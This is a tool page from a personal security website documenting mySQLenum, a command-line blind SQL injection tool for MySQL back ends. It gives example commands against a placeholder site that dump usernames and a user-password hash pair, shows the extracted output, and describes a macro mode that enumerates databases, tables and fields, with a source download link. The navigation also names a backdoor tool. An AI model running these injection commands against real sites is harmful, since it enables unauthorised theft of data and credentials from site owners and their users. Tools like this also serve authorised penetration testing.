• Changelog
• Curriculum
• Exploits
• Tools
• G4FanControl
• Proxy Applet
• mySQLenum
• Prism Backdoor
• DNS Proxy
• Articles
• Online Utilities
• Contacts

mySQLenum

mySQLenum is a command line automatic blind sql injection tool for web applications that uses MySql server as its back-end.
It's written in pure c, don't depends from external library, is fast and support all MySQL versions.

To work it requires at the least 5 parameters:

• --url: target URL
• --sql-query: sql query to execute (or --macro to enter in Macro mode)
• --param: vulnerable parameter
• --param-value: a valid value to assign to parameter
• --match-string: string to match in page content when the query is valid

Example:

mysqlenum --url="http://www.example.com/page.php" --sql-query="select username from users" --param=page_id --param-value=1 --match-string="Articolo 22" --http-auth="user:P4ssw0rd"

mySQLenum 0.2

 Query: select username from users

 1)    root
 2)    local 
 3)    marco 
 4)    luca 
 5)    ---

 > Total requests: 192
 > Data sent: 40 Kb
 > Data received: 862 Kb

If not specified mySQLenum assumes that:

• the request type is GET
• the webserver port is 80
• the charset used during the enumeration is included between the ASCII values 32 and 122

Using an sql injection is obviously possible to enumerate one field at time. However we can use the CONCAT function to enumerate more fields with only one query:

mysqlenum --url="http://www.example.com/page.php" --param=page_id --param-value=2 -match-string="Articolo 22" --sql-query="select concat(user,0x20,password) from accounts where id=1"

mySQLenum 0.2

 Query: select concat(user,0x20,password) from accounts where id=1

 1)    admin e66cd1784f3cd5191f680f90bd2aac8f 
 2)    ---

 > Total requests: 302
 > Data sent: 84 Kb
 > Data received: 1533 Kb

The algorithm used during the enumeration of a single character was designed to reduce the requests number executed and limit the bandwidth usage.
mySQLenum supports more options, availables in the program help.

Macro Mode

Using the interactive Macro mode is possible to automatically enumerate:

• all available databases
• all tables of a specific database
• all fields of a specific table

To work, the macro mode requires that the INFORMATION_SCHEMA is accessible.

Example:

mysqlenum --url="http://www.example.com/page.php" --macro --param=page_id --param-value=1 --match-string="Articolo 22"

mySQLenum 0.2

  Available macros:
    1) Databases enumeration
    2) Tables enumeration
    3) Fields enumeration

  Your choice: 1

Databases:
 1)    information_schema 
 2)    site 
 3)    ---

 > Total requests: 227
 > Data sent: 62 Kb
 > Data received: 1066 Kb

Download:

Source tarball mysqlenum-0.2.tar.gz

---

www.andreafabrizi.it ©2010 Andrea Fabrizi